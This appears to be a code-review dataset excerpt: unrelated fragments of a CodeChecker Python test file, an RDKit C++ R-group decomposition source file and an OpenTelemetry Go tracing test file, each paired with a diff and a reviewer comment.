res = self._cc_client.getReviewStatusCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.ReviewStatus.UNREVIEWED: 18}
self.assertDictEqual(res, test_res)
def test_get_diff_res_review_status_counts(self):
"""
Test diff result types for all unresolved checker counts.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
res = self._cc_client.getReviewStatusCounts([base_run_id],
None,
cmp_data)
test_res = {shared.ttypes.ReviewStatus.UNREVIEWED: 3}
self.assertDictEqual(res, test_res)
def test_get_diff_res_types_resolved(self):
"""
Test diff result types for resolved results.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.RESOLVED)
diff_res = self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
test_res = {'core.StackAddressEscape': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_res_types_unresolved(self):
"""
Test diff result types for unresolved results with no filter
on the api.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
diff_res_types_filter = self._testproject_data[self._clang_to_test][
'diff_res_types_filter']
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
diff_res = \
self._cc_client.getCheckerCounts([base_run_id],
None,
cmp_data)
test_res = {'cplusplus.NewDelete': 5,
'deadcode.DeadStores': 5,
'unix.Malloc': 1,
'core.NullDereference': 4,
'core.DivideZero': 3}
self.assertDictEqual(diff_res, test_res)
def test_get_diff_res_types_unresolved_filter(self):
"""
Test diff result types for unresolved results with filter.
"""
base_run_id = self._base_runid
new_run_id = self._new_runid
diff_res_types_filter = self._testproject_data[self._clang_to_test][
'diff_res_types_filter']
cmp_data = CompareData(run_ids=[new_run_id],
diff_type=DiffType.UNRESOLVED)
for level in diff_res_types_filter:
for checker_name, test_result_count in level.items():
checker_filter = ReportFilter_v2(checkerName=[checker_name])
diff_res = \
self._cc_client.getCheckerCounts([base_run_id],
checker_filter,
cmp_data)
# There should be only one result for each checker name.
self.assertEqual(len(diff_res), 1)
self.assertEqual(test_result_count, diff_res[checker_name])
def test_local_compare_res_count_new(self):
"""
Count the new results with no filter in local compare mode.
"""
base_run_name = self._run_names[0]
vh = self._test_config['codechecker_cfg']['viewer_host']
vp = self._test_config['codechecker_cfg']['viewer_port']
diff_cmd = [self._codechecker_cmd, "cmd", "diff",
"--new",
"--host", vh,
"--port", str(vp),
"-b", base_run_name,
"-n", self._report_dir
]
print(diff_cmd)
process = subprocess.Popen(
diff_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.environ['TEST_WORKSPACE'])
out, err = process.communicate()
print(out+err)
# 5 new core.CallAndMessage issues.
count = len(re.findall(r'\[core\.CallAndMessage\]', out))
self.assertEqual(count, 5)
def test_local_compare_res_count_resovled(self):
"""
Count the resolved results with no filter in local compare mode.
"""
base_run_name = self._run_names[0]
vh = self._test_config['codechecker_cfg']['viewer_host']
vp = self._test_config['codechecker_cfg']['viewer_port']
diff_cmd = [self._codechecker_cmd, "cmd", "diff",
"--resolved",
"--host", vh,
"--port", str(vp),
"-b", base_run_name,
"-n", self._report_dir
]
print(diff_cmd)
process = subprocess.Popen(
diff_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.environ['TEST_WORKSPACE'])
out, err = process.communicate()
print(out+err)
# # 3 disappeared core.StackAddressEscape issues
count = len(re.findall(r'\[core\.StackAddressEscape\]', out))
self.assertEqual(count, 3)
def test_local_compare_res_count_unresovled(self):
"""
Count the unresolved results with no filter in local compare mode.
"""
base_run_name = self._run_names[0]
vh = self._test_config['codechecker_cfg']['viewer_host']
vp = self._test_config['codechecker_cfg']['viewer_port']
diff_cmd = [self._codechecker_cmd, "cmd", "diff",
"--unresolved",
"--host", vh,
"--port", str(vp),
"-b", base_run_name,
"-n", self._report_dir
]
print(diff_cmd)
process = subprocess.Popen(
diff_cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.environ['TEST_WORKSPACE'])
out, err = process.communicate()
print(out+err)
# # 3 disappeared core.StackAddressEscape issues
count = len(re.findall(r'\[core\.DivideZero\]', out))
self.assertEqual(count, 3)
count = len(re.findall(r'\[deadcode\.DeadStores\]', out))
self.assertEqual(count, 5)
count = len(re.findall(r'\[core\.NullDereference\]', out))
self.assertEqual(count, 4)
count = len(re.findall(r'\[cplusplus\.NewDelete\]', out))
self.assertEqual(count, 5)
count = len(re.findall(r'\[unix\.Malloc\]', out))
self.assertEqual(count, 1)
count = len(re.findall(r'\[core.DivideZero\]', out))
self.assertEqual(count, 3)
| 1 | 7,514 | What is the actual change here, why is this test change needed? Now the diff will send back more data? | Ericsson-codechecker | c |
@@ -89,6 +89,17 @@ int RGroupDecomposition::add(const ROMol &inmol) {
const bool addCoords = true;
MolOps::addHs(mol, explicitOnly, addCoords);
+ // mark any wildcards in input molecule:
+ for (auto &atom : mol.atoms()) {
+ if (atom->getAtomicNum() == 0) {
+ atom->setIsotope(1000U);
+ // clean any existing R group numbers
+ atom->setAtomMapNum(0);
+ if (atom->hasProp(common_properties::_MolFileRLabel)) {
+ atom->clearProp(common_properties::_MolFileRLabel);
+ }
+ }
+ }
int core_idx = 0;
const RCore *rcore = nullptr;
std::vector<MatchVectType> tmatches; | 1 | //
// Copyright (c) 2017-2021, Novartis Institutes for BioMedical Research Inc.
// and other RDKit contributors
//
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Novartis Institutes for BioMedical Research Inc.
// nor the names of its contributors may be used to endorse or promote
// products derived from this software without specific prior written
// permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
//
#include "RGroupDecomp.h"
#include "RGroupDecompData.h"
#include <GraphMol/RDKitBase.h>
#include <GraphMol/Substruct/SubstructMatch.h>
#include <GraphMol/SmilesParse/SmilesWrite.h>
#include <GraphMol/SmilesParse/SmartsWrite.h>
#include <GraphMol/SmilesParse/SmilesParse.h>
#include <GraphMol/ChemTransforms/ChemTransforms.h>
#include <GraphMol/FMCS/FMCS.h>
#include <boost/scoped_ptr.hpp>
#include <boost/dynamic_bitset.hpp>
#include <set>
#include <utility>
#include <vector>
// #define VERBOSE 1
namespace RDKit {
// Attachment Points
// labeled cores => isotopes
// atom mappings
// atom indices => use -1 - atom index, range is [-1, ...., -num_atoms]
const std::string RLABEL = "tempRlabel";
const std::string RLABEL_TYPE = "tempRlabelType";
const std::string RLABEL_CORE_INDEX = "rLabelCoreIndex";
const std::string SIDECHAIN_RLABELS = "sideChainRlabels";
const std::string done = "RLABEL_PROCESSED";
const std::string CORE = "Core";
const std::string RPREFIX = "R";
namespace {
void ADD_MATCH(R_DECOMP &match, int rlabel) {
if (match.find(rlabel) == match.end()) {
match[rlabel] = boost::make_shared<RGroupData>();
}
}
} // namespace
RGroupDecomposition::RGroupDecomposition(
const ROMol &inputCore, const RGroupDecompositionParameters ¶ms)
: data(new RGroupDecompData(inputCore, params)) {}
RGroupDecomposition::RGroupDecomposition(
const std::vector<ROMOL_SPTR> &cores,
const RGroupDecompositionParameters ¶ms)
: data(new RGroupDecompData(cores, params)) {}
RGroupDecomposition::~RGroupDecomposition() { delete data; }
int RGroupDecomposition::add(const ROMol &inmol) {
// get the sidechains if possible
// Add hs for better symmetrization
RWMol mol(inmol);
const bool explicitOnly = false;
const bool addCoords = true;
MolOps::addHs(mol, explicitOnly, addCoords);
int core_idx = 0;
const RCore *rcore = nullptr;
std::vector<MatchVectType> tmatches;
std::vector<MatchVectType> tmatches_filtered;
// Find the first matching core (onlyMatchAtRGroups)
// or the first core that requires the smallest number
// of newly added labels
int global_min_heavy_nbrs = -1;
SubstructMatchParameters sssparams(params().substructmatchParams);
sssparams.uniquify = false;
sssparams.recursionPossible = true;
for (const auto &core : data->cores) {
{
// matching the core to the molecule is a two step process
// First match to a reduced representation (the core minus terminal
// R-groups). Next, match the R-groups. We do this as the core may not be
// a substructure match for the molecule if a single molecule atom matches
// 2 RGroup attachments (see https://github.com/rdkit/rdkit/pull/4002)
// match the reduced represenation:
std::vector<MatchVectType> baseMatches =
SubstructMatch(mol, *core.second.matchingMol, sssparams);
tmatches.clear();
for (const auto &baseMatch : baseMatches) {
// Match the R Groups
auto matchesWithDummy =
core.second.matchTerminalUserRGroups(mol, baseMatch, sssparams);
tmatches.insert(tmatches.end(), matchesWithDummy.cbegin(),
matchesWithDummy.cend());
}
}
if (tmatches.empty()) {
continue;
}
std::vector<int> tmatches_heavy_nbrs(tmatches.size(), 0);
size_t i = 0;
for (const auto &mv : tmatches) {
bool passes_filter = data->params.onlyMatchAtRGroups;
boost::dynamic_bitset<> target_match_indices(mol.getNumAtoms());
for (const auto &match : mv) {
target_match_indices[match.second] = 1;
}
// target atoms that map to user defined R-groups
std::vector<int> targetAttachments;
for (const auto &match : mv) {
const Atom *atm = mol.getAtomWithIdx(match.second);
// is this a labelled rgroup or not?
if (!core.second.isCoreAtomUserLabelled(match.first)) {
// nope... if any neighbor is not part of the substructure
// make sure we are a hydrogen, otherwise, skip the match
for (const auto &nbri :
boost::make_iterator_range(mol.getAtomNeighbors(atm))) {
const auto &nbr = mol[nbri];
if (nbr->getAtomicNum() != 1 &&
!target_match_indices[nbr->getIdx()]) {
if (data->params.onlyMatchAtRGroups) {
passes_filter = false;
break;
} else {
++tmatches_heavy_nbrs[i];
}
}
}
} else {
// labelled R-group
if (core.second.isTerminalRGroupWithUserLabel(match.first)) {
targetAttachments.push_back(match.second);
}
}
if (!passes_filter && data->params.onlyMatchAtRGroups) {
break;
}
if (passes_filter && data->params.onlyMatchAtRGroups) {
for (auto attachmentIdx : targetAttachments) {
if (!core.second.checkAllBondsToAttachmentPointPresent(
mol, attachmentIdx, mv)) {
passes_filter = false;
break;
}
}
}
}
if (passes_filter) {
tmatches_filtered.push_back(mv);
}
++i;
}
if (!data->params.onlyMatchAtRGroups) {
int min_heavy_nbrs = *std::min_element(tmatches_heavy_nbrs.begin(),
tmatches_heavy_nbrs.end());
if (global_min_heavy_nbrs == -1 ||
min_heavy_nbrs < global_min_heavy_nbrs) {
i = 0;
tmatches_filtered.clear();
for (const auto heavy_nbrs : tmatches_heavy_nbrs) {
if (heavy_nbrs <= min_heavy_nbrs) {
tmatches_filtered.push_back(std::move(tmatches[i]));
}
++i;
}
global_min_heavy_nbrs = min_heavy_nbrs;
rcore = &core.second;
core_idx = core.first;
if (global_min_heavy_nbrs == 0) {
break;
}
}
} else if (!tmatches_filtered.empty()) {
rcore = &core.second;
core_idx = core.first;
break;
}
}
tmatches = std::move(tmatches_filtered);
if (tmatches.size() > 1) {
if (data->params.matchingStrategy == NoSymmetrization) {
tmatches.resize(1);
} else if (data->matches.size() == 0) {
// Greedy strategy just grabs the first match and
// takes the best matches from the rest
if (data->params.matchingStrategy == Greedy) {
tmatches.resize(1);
}
}
}
if (rcore == nullptr) {
BOOST_LOG(rdDebugLog) << "No core matches" << std::endl;
return -1;
}
// strategies
// ==========
// Exhaustive - saves all matches and optimizes later exhaustive
// May never finish due to combinatorial complexity
// Greedy - matches to *FIRST* available match
// GreedyChunks - default - process every N chunks
// Should probably scan all mols first to find match with
// smallest number of matches...
std::vector<RGroupMatch> potentialMatches;
std::unique_ptr<ROMol> tMol;
for (const auto &tmatche : tmatches) {
const bool replaceDummies = false;
const bool labelByIndex = true;
const bool requireDummyMatch = false;
bool hasCoreDummies = false;
auto coreCopy =
rcore->replaceCoreAtomsWithMolMatches(hasCoreDummies, mol, tmatche);
tMol.reset(replaceCore(mol, *coreCopy, tmatche, replaceDummies,
labelByIndex, requireDummyMatch));
#ifdef VERBOSE
std::cerr << "Core Match core_idx " << core_idx << " idx "
<< data->matches.size() << ": " << MolToSmarts(*coreCopy)
<< std::endl;
#endif
if (tMol) {
#ifdef VERBOSE
std::cerr << "All Fragments " << MolToSmiles(*tMol) << std::endl;
#endif
R_DECOMP match;
// rlabel rgroups
MOL_SPTR_VECT fragments = MolOps::getMolFrags(*tMol, false);
std::set<int> coreAtomAnyMatched;
for (size_t i = 0; i < fragments.size(); ++i) {
std::vector<int> attachments;
boost::shared_ptr<ROMol> &newMol = fragments[i];
newMol->setProp<int>("core", core_idx);
newMol->setProp<int>("idx", data->matches.size());
newMol->setProp<int>("frag_idx", i);
#ifdef VERBOSE
std::cerr << "Fragment " << MolToSmiles(*newMol) << std::endl;
#endif
for (auto at : newMol->atoms()) {
unsigned int elno = at->getAtomicNum();
if (elno == 0) {
unsigned int index =
at->getIsotope(); // this is the index into the core
// it messes up when there are multiple ?
int rlabel;
auto coreAtom = rcore->core->getAtomWithIdx(index);
coreAtomAnyMatched.insert(index);
if (coreAtom->getPropIfPresent(RLABEL, rlabel)) {
std::vector<int> rlabelsOnSideChain;
at->getPropIfPresent(SIDECHAIN_RLABELS, rlabelsOnSideChain);
rlabelsOnSideChain.push_back(rlabel);
at->setProp(SIDECHAIN_RLABELS, rlabelsOnSideChain);
data->labels.insert(rlabel); // keep track of all labels used
attachments.push_back(rlabel);
}
}
}
if (attachments.size() > 0) {
// reject multiple attachments?
// what to do with labelled cores ?
std::string newCoreSmi = MolToSmiles(*newMol, true);
for (size_t attach_idx = 0; attach_idx < attachments.size();
++attach_idx) {
int rlabel = attachments[attach_idx];
ADD_MATCH(match, rlabel);
match[rlabel]->add(newMol, attachments);
#ifdef VERBOSE
std::cerr << "Fragment " << i << " R" << rlabel << " "
<< MolToSmiles(*newMol) << std::endl;
#endif
}
} else {
// special case, only one fragment
if (fragments.size() == 1) { // need to make a new core
// remove the sidechains
// GJ I think if we ever get here that it's really an error and I
// believe that I've fixed the case where this code was called.
// Still, I'm too scared to delete the block.
RWMol newCore(mol);
for (const auto &mvpair : tmatche) {
const Atom *coreAtm = rcore->core->getAtomWithIdx(mvpair.first);
Atom *newCoreAtm = newCore.getAtomWithIdx(mvpair.second);
int rlabel;
if (coreAtm->getPropIfPresent(RLABEL, rlabel)) {
newCoreAtm->setProp<int>(RLABEL, rlabel);
}
newCoreAtm->setProp<bool>("keep", true);
}
newCore.beginBatchEdit();
for (const auto atom : newCore.atoms()) {
if (!atom->hasProp("keep")) {
newCore.removeAtom(atom);
}
}
newCore.commitBatchEdit();
if (newCore.getNumAtoms()) {
std::string newCoreSmi = MolToSmiles(newCore, true);
// add a new core if possible
auto newcore = data->newCores.find(newCoreSmi);
int core_idx = 0;
if (newcore == data->newCores.end()) {
core_idx = data->newCores[newCoreSmi] = data->newCoreLabel--;
data->cores[core_idx] = RCore(newCore);
return add(inmol);
}
}
}
}
}
if (match.size()) {
auto numberUserGroupsInMatch = std::accumulate(
match.begin(), match.end(), 0,
[](int sum, std::pair<int, boost::shared_ptr<RGroupData>> p) {
return p.first > 0 && !p.second->is_hydrogen ? ++sum : sum;
});
int numberMissingUserGroups =
rcore->numberUserRGroups - numberUserGroupsInMatch;
CHECK_INVARIANT(numberMissingUserGroups >= 0,
"Data error in missing user rgroup count");
potentialMatches.emplace_back(
core_idx, numberMissingUserGroups, match,
hasCoreDummies || !data->params.onlyMatchAtRGroups ? coreCopy
: nullptr);
}
}
}
if (potentialMatches.size() == 0) {
BOOST_LOG(rdDebugLog) << "No attachment points in side chains" << std::endl;
return -2;
}
// in case the value ends up being changed in a future version of the code:
if (data->prunePermutations) {
data->permutationProduct = 1;
}
if (data->params.matchingStrategy != GA) {
size_t N = data->permutationProduct;
for (auto matche = data->matches.begin() + data->previousMatchSize;
matche != data->matches.end(); ++matche) {
size_t sz = matche->size();
N *= sz;
}
// oops, exponential is a pain
if (N * potentialMatches.size() > 100000) {
data->permutationProduct = N;
data->process(data->prunePermutations);
}
}
data->matches.push_back(potentialMatches);
if (data->matches.size()) {
if (data->params.matchingStrategy & Greedy ||
(data->params.matchingStrategy & GreedyChunks &&
data->matches.size() > 1 &&
data->matches.size() % data->params.chunkSize == 0)) {
data->process(data->prunePermutations);
}
}
return data->matches.size() - 1;
}
bool RGroupDecomposition::process() { return processAndScore().success; }
RGroupDecompositionProcessResult RGroupDecomposition::processAndScore() {
try {
const bool finalize = true;
return data->process(data->prunePermutations, finalize);
} catch (...) {
return RGroupDecompositionProcessResult(false, -1);
}
}
std::vector<std::string> RGroupDecomposition::getRGroupLabels() const {
// this is a bit of a cheat
RGroupColumns cols = getRGroupsAsColumns();
std::vector<std::string> labels;
for (auto it : cols) {
labels.push_back(it.first);
}
std::sort(labels.begin(), labels.end());
return labels;
}
RWMOL_SPTR RGroupDecomposition::outputCoreMolecule(
const RGroupMatch &match, const UsedLabelMap &usedLabelMap) const {
const auto &core = data->cores[match.core_idx];
if (!match.matchedCore) {
return core.labelledCore;
}
auto coreWithMatches = core.coreWithMatches(*match.matchedCore);
for (auto atomIdx = coreWithMatches->getNumAtoms(); atomIdx--;) {
auto atom = coreWithMatches->getAtomWithIdx(atomIdx);
if (atom->getAtomicNum()) {
continue;
}
auto label = atom->getAtomMapNum();
Atom *nbrAtom = nullptr;
for (const auto &nbri :
boost::make_iterator_range(coreWithMatches->getAtomNeighbors(atom))) {
nbrAtom = (*coreWithMatches)[nbri];
break;
}
if (nbrAtom) {
bool isUserDefinedLabel = usedLabelMap.isUserDefined(label);
auto numExplicitHs = nbrAtom->getNumExplicitHs();
if (usedLabelMap.getIsUsed(label)) {
if (numExplicitHs) {
nbrAtom->setNumExplicitHs(numExplicitHs - 1);
}
} else if (!isUserDefinedLabel ||
data->params.removeAllHydrogenRGroupsAndLabels) {
coreWithMatches->removeAtom(atomIdx);
// if we remove an unused label from an aromatic atom,
// we need to check whether we need to adjust its explicit
// H count, or it will fail to kekulize
if (isUserDefinedLabel && nbrAtom->getIsAromatic()) {
nbrAtom->updatePropertyCache(false);
if (!numExplicitHs) {
nbrAtom->setNumExplicitHs(nbrAtom->getExplicitValence() -
nbrAtom->getDegree());
}
}
}
nbrAtom->updatePropertyCache(false);
}
}
return coreWithMatches;
}
RGroupRows RGroupDecomposition::getRGroupsAsRows() const {
std::vector<RGroupMatch> permutation = data->GetCurrentBestPermutation();
RGroupRows groups;
auto usedLabelMap = UsedLabelMap(data->finalRlabelMapping);
for (auto it = permutation.begin(); it != permutation.end(); ++it) {
auto Rs_seen(usedLabelMap);
// make a new rgroup entry
groups.push_back(RGroupRow());
RGroupRow &out_rgroups = groups.back();
const R_DECOMP &in_rgroups = it->rgroups;
for (const auto &rgroup : in_rgroups) {
const auto realLabel = data->finalRlabelMapping.find(rgroup.first);
CHECK_INVARIANT(realLabel != data->finalRlabelMapping.end(),
"unprocessed rlabel, please call process() first.");
Rs_seen.setIsUsed(realLabel->second);
out_rgroups[RPREFIX + std::to_string(realLabel->second)] =
rgroup.second->combinedMol;
}
out_rgroups[CORE] = outputCoreMolecule(*it, Rs_seen);
}
return groups;
}
//! return rgroups in column order group[attachment_point][molidx] = ROMol
RGroupColumns RGroupDecomposition::getRGroupsAsColumns() const {
std::vector<RGroupMatch> permutation = data->GetCurrentBestPermutation();
RGroupColumns groups;
std::unordered_set<std::string> rGroupWithRealMol{CORE};
auto usedLabelMap = UsedLabelMap(data->finalRlabelMapping);
unsigned int molidx = 0;
for (auto it = permutation.begin(); it != permutation.end(); ++it, ++molidx) {
auto Rs_seen(usedLabelMap);
const R_DECOMP &in_rgroups = it->rgroups;
for (const auto &rgroup : in_rgroups) {
const auto realLabel = data->finalRlabelMapping.find(rgroup.first);
CHECK_INVARIANT(realLabel != data->finalRlabelMapping.end(),
"unprocessed rlabel, please call process() first.");
CHECK_INVARIANT(rgroup.second->combinedMol->hasProp(done),
"Not done! Call process()");
CHECK_INVARIANT(!Rs_seen.getIsUsed(realLabel->second),
"R group label appears multiple times!");
Rs_seen.setIsUsed(realLabel->second);
std::string r = RPREFIX + std::to_string(realLabel->second);
RGroupColumn &col = groups[r];
if (molidx && col.size() < molidx - 1) {
col.resize(molidx - 1);
}
col.push_back(rgroup.second->combinedMol);
rGroupWithRealMol.insert(r);
}
groups[CORE].push_back(outputCoreMolecule(*it, Rs_seen));
// add empty entries to columns where this molecule didn't appear
for (const auto &realLabel : data->finalRlabelMapping) {
if (!Rs_seen.getIsUsed(realLabel.second)) {
std::string r = RPREFIX + std::to_string(realLabel.second);
groups[r].push_back(boost::make_shared<RWMol>());
}
}
}
// purge R-group entries that have no mols
for (auto it = groups.begin(); it != groups.end();) {
auto itToErase = groups.end();
if (!rGroupWithRealMol.count(it->first)) {
itToErase = it;
}
++it;
if (itToErase != groups.end()) {
groups.erase(itToErase);
}
}
return groups;
}
const RGroupDecompositionParameters &RGroupDecomposition::params() const {
return data->params;
}
namespace {
std::vector<unsigned int> Decomp(RGroupDecomposition &decomp,
const std::vector<ROMOL_SPTR> &mols) {
auto t0 = std::chrono::steady_clock::now();
std::vector<unsigned int> unmatched;
for (size_t i = 0; i < mols.size(); ++i) {
int v = decomp.add(*mols[i].get());
if (v == -1) {
unmatched.push_back(i);
}
checkForTimeout(t0, decomp.params().timeout);
}
decomp.process();
return unmatched;
}
} // namespace
unsigned int RGroupDecompose(const std::vector<ROMOL_SPTR> &cores,
const std::vector<ROMOL_SPTR> &mols,
RGroupRows &rows,
std::vector<unsigned int> *unmatchedIndices,
const RGroupDecompositionParameters &options) {
RGroupDecomposition decomp(cores, options);
std::vector<unsigned int> unmatched = Decomp(decomp, mols);
if (unmatchedIndices) {
*unmatchedIndices = unmatched;
}
rows = decomp.getRGroupsAsRows();
return mols.size() - unmatched.size();
}
unsigned int RGroupDecompose(const std::vector<ROMOL_SPTR> &cores,
const std::vector<ROMOL_SPTR> &mols,
RGroupColumns &columns,
std::vector<unsigned int> *unmatchedIndices,
const RGroupDecompositionParameters &options) {
RGroupDecomposition decomp(cores, options);
std::vector<unsigned int> unmatched = Decomp(decomp, mols);
if (unmatchedIndices) {
*unmatchedIndices = unmatched;
}
columns = decomp.getRGroupsAsColumns();
return mols.size() - unmatched.size();
}
} // namespace RDKit
| 1 | 23,959 | Might be better to use a tag here. I for one have used 1000 isotopes as a tag in the past... | rdkit-rdkit | cpp |
@@ -128,11 +128,11 @@ func TestSetName(t *testing.T) {
}
}
-func TestRecordingIsOff(t *testing.T) {
+func TestRecordingIsOn(t *testing.T) {
tp, _ := NewProvider()
_, span := tp.Tracer("Recording off").Start(context.Background(), "StartSpan")
defer span.End()
- if span.IsRecording() == true {
+ if span.IsRecording() == false {
t.Error("new span is recording events")
}
} | 1 | // Copyright 2019, OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package trace
import (
"context"
"errors"
"fmt"
"math"
"strings"
"sync/atomic"
"testing"
"time"
"github.com/google/go-cmp/cmp"
"google.golang.org/grpc/codes"
"go.opentelemetry.io/otel/api/core"
"go.opentelemetry.io/otel/api/key"
"go.opentelemetry.io/otel/api/testharness"
"go.opentelemetry.io/otel/api/trace"
apitrace "go.opentelemetry.io/otel/api/trace"
ottest "go.opentelemetry.io/otel/internal/testing"
export "go.opentelemetry.io/otel/sdk/export/trace"
)
var (
tid core.TraceID
sid core.SpanID
)
func init() {
tid, _ = core.TraceIDFromHex("01020304050607080102040810203040")
sid, _ = core.SpanIDFromHex("0102040810203040")
}
func TestTracerFollowsExpectedAPIBehaviour(t *testing.T) {
tp, err := NewProvider(WithConfig(Config{DefaultSampler: ProbabilitySampler(0)}))
if err != nil {
t.Fatalf("failed to create provider, err: %v\n", err)
}
harness := testharness.NewHarness(t)
subjectFactory := func() trace.Tracer {
return tp.Tracer("")
}
harness.TestTracer(subjectFactory)
}
type testExporter struct {
spans []*export.SpanData
}
func (t *testExporter) ExportSpan(ctx context.Context, d *export.SpanData) {
t.spans = append(t.spans, d)
}
func TestSetName(t *testing.T) {
samplerIsCalled := false
fooSampler := Sampler(func(p SamplingParameters) SamplingDecision {
samplerIsCalled = true
t.Logf("called sampler for name %q", p.Name)
return SamplingDecision{Sample: strings.HasPrefix(p.Name, "foo")}
})
tp, _ := NewProvider(WithConfig(Config{DefaultSampler: fooSampler}))
type testCase struct {
name string
newName string
sampledBefore bool
sampledAfter bool
}
for idx, tt := range []testCase{
{ // 0
name: "foobar",
newName: "foobaz",
sampledBefore: true,
sampledAfter: true,
},
{ // 1
name: "foobar",
newName: "barbaz",
sampledBefore: true,
sampledAfter: false,
},
{ // 2
name: "barbar",
newName: "barbaz",
sampledBefore: false,
sampledAfter: false,
},
{ // 3
name: "barbar",
newName: "foobar",
sampledBefore: false,
sampledAfter: true,
},
} {
span := startNamedSpan(tp, "SetName", tt.name)
if !samplerIsCalled {
t.Errorf("%d: the sampler was not even called during span creation", idx)
}
samplerIsCalled = false
if gotSampledBefore := span.SpanContext().IsSampled(); tt.sampledBefore != gotSampledBefore {
t.Errorf("%d: invalid sampling decision before rename, expected %v, got %v", idx, tt.sampledBefore, gotSampledBefore)
}
span.SetName(tt.newName)
if !samplerIsCalled {
t.Errorf("%d: the sampler was not even called during span rename", idx)
}
samplerIsCalled = false
if gotSampledAfter := span.SpanContext().IsSampled(); tt.sampledAfter != gotSampledAfter {
t.Errorf("%d: invalid sampling decision after rename, expected %v, got %v", idx, tt.sampledAfter, gotSampledAfter)
}
span.End()
}
}
func TestRecordingIsOff(t *testing.T) {
tp, _ := NewProvider()
_, span := tp.Tracer("Recording off").Start(context.Background(), "StartSpan")
defer span.End()
if span.IsRecording() == true {
t.Error("new span is recording events")
}
}
func TestSampling(t *testing.T) {
idg := defIDGenerator()
const total = 10000
for name, tc := range map[string]struct {
sampler Sampler
expect float64
parent bool
sampledParent bool
}{
// Span w/o a parent
"NeverSample": {sampler: NeverSample(), expect: 0},
"AlwaysSample": {sampler: AlwaysSample(), expect: 1.0},
"ProbabilitySampler_-1": {sampler: ProbabilitySampler(-1.0), expect: 0},
"ProbabilitySampler_.25": {sampler: ProbabilitySampler(0.25), expect: .25},
"ProbabilitySampler_.50": {sampler: ProbabilitySampler(0.50), expect: .5},
"ProbabilitySampler_.75": {sampler: ProbabilitySampler(0.75), expect: .75},
"ProbabilitySampler_2.0": {sampler: ProbabilitySampler(2.0), expect: 1},
// Spans with a parent that is *not* sampled act like spans w/o a parent
"UnsampledParentSpanWithProbabilitySampler_-1": {sampler: ProbabilitySampler(-1.0), expect: 0, parent: true},
"UnsampledParentSpanWithProbabilitySampler_.25": {sampler: ProbabilitySampler(.25), expect: .25, parent: true},
"UnsampledParentSpanWithProbabilitySampler_.50": {sampler: ProbabilitySampler(0.50), expect: .5, parent: true},
"UnsampledParentSpanWithProbabilitySampler_.75": {sampler: ProbabilitySampler(0.75), expect: .75, parent: true},
"UnsampledParentSpanWithProbabilitySampler_2.0": {sampler: ProbabilitySampler(2.0), expect: 1, parent: true},
// Spans with a parent that is sampled, will always sample, regardless of the probability
"SampledParentSpanWithProbabilitySampler_-1": {sampler: ProbabilitySampler(-1.0), expect: 1, parent: true, sampledParent: true},
"SampledParentSpanWithProbabilitySampler_.25": {sampler: ProbabilitySampler(.25), expect: 1, parent: true, sampledParent: true},
"SampledParentSpanWithProbabilitySampler_2.0": {sampler: ProbabilitySampler(2.0), expect: 1, parent: true, sampledParent: true},
// Spans with a sampled parent, but when using the NeverSample Sampler, aren't sampled
"SampledParentSpanWithNeverSample": {sampler: NeverSample(), expect: 0, parent: true, sampledParent: true},
} {
tc := tc
t.Run(name, func(t *testing.T) {
t.Parallel()
p, err := NewProvider(WithConfig(Config{DefaultSampler: tc.sampler}))
if err != nil {
t.Fatal("unexpected error:", err)
}
tr := p.Tracer("test")
var sampled int
for i := 0; i < total; i++ {
ctx := context.Background()
if tc.parent {
psc := core.SpanContext{
TraceID: idg.NewTraceID(),
SpanID: idg.NewSpanID(),
}
if tc.sampledParent {
psc.TraceFlags = core.TraceFlagsSampled
}
ctx = apitrace.ContextWithRemoteSpanContext(ctx, psc)
}
_, span := tr.Start(ctx, "test")
if span.SpanContext().IsSampled() {
sampled++
}
}
tolerance := 0.0
got := float64(sampled) / float64(total)
if tc.expect > 0 && tc.expect < 1 {
// See https://en.wikipedia.org/wiki/Binomial_proportion_confidence_interval
const z = 4.75342 // This should succeed 99.9999% of the time
tolerance = z * math.Sqrt(got*(1-got)/total)
}
